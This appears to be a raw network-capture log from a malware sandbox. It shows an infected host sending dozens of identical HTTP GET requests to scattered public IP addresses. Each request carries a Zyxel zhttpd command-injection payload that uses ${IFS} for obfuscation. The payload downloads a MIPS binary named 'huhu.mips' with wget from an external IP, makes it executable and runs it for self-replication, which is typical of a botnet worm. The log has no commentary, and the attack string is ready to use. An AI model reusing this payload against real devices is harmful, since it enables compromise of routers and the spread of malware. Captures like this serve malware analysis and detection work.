                                                  Jan 19, 2024 18:24:02.187573910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5890192.168.2.135028285.142.132.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187616110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5891192.168.2.1336694110.224.131.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187659025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5892192.168.2.1333266148.26.241.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187701941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5893192.168.2.134380423.39.189.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187742949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5894192.168.2.1360792194.48.224.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187788963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5895192.168.2.134373043.145.78.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187827110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5896192.168.2.1354362135.53.129.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187875986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5897192.168.2.1354110222.27.111.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187922955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5898192.168.2.134215681.121.154.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187961102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5899192.168.2.1354104135.199.166.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188007116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5900192.168.2.1359744124.104.72.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188040018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5901192.168.2.134813649.137.77.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188061953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5902192.168.2.134649282.188.180.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188101053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5903192.168.2.1351830178.105.11.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188153982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5904192.168.2.1353340162.255.193.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188189030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5905192.168.2.135871049.23.122.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188232899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5906192.168.2.133355268.154.189.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188286066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5907192.168.2.1349138101.141.249.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188318014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5908192.168.2.1350980144.67.206.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188380957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5909192.168.2.1358244203.0.28.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188416958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5910192.168.2.1360978182.4.149.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188457012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5911192.168.2.1358716160.254.123.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188497066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5912192.168.2.1340302175.142.77.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188543081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5913192.168.2.133717639.219.140.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188590050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5914192.168.2.1346112154.6.244.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188636065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5915192.168.2.135574843.106.176.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188663006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5916192.168.2.133346283.242.189.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188718081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5917192.168.2.1359890199.140.99.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188767910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5918192.168.2.134291898.178.245.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188781977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5919192.168.2.1351066172.56.104.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188841105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5920192.168.2.1352134177.187.138.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188874006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5921192.168.2.1349176158.197.146.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188927889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5922192.168.2.1343462126.238.92.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.188982964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5923192.168.2.133558418.20.231.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189003944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5924192.168.2.133881078.76.48.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189027071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5925192.168.2.134772035.173.190.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189073086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5926192.168.2.1350120126.222.18.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189120054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5927192.168.2.136013057.173.47.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189166069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5928192.168.2.135260498.105.208.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189229965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5929192.168.2.134092444.72.122.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189254999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5930192.168.2.1353924170.40.198.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189306974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5931192.168.2.133331885.224.187.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189353943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5932192.168.2.1359374141.159.164.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189385891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5933192.168.2.133724037.121.86.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189426899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5934192.168.2.1357200182.201.23.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189450979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5935192.168.2.135776243.253.224.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189497948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5936192.168.2.134132079.7.178.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189548969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5937192.168.2.1357506170.37.117.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189596891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5938192.168.2.1344522155.34.185.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189621925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5939192.168.2.1343782175.181.191.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189688921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5940192.168.2.1347896107.254.195.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189723015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5941192.168.2.134296225.45.15.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189766884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5942192.168.2.1337182157.229.194.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189811945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5943192.168.2.1335086118.106.37.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189863920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5944192.168.2.133352295.131.101.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189897060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5945192.168.2.1349514104.118.45.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189937115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5946192.168.2.1342018180.111.30.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.189995050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5947192.168.2.135381017.132.52.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190017939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5948192.168.2.1341980134.99.202.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190079927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5949192.168.2.135427651.233.169.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190115929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5950192.168.2.1350760105.250.59.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190152884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5951192.168.2.1338694132.129.151.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.190205097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5952192.168.2.1352494197.198.169.99443
                                                  TimestampBytes transferredDirectionData
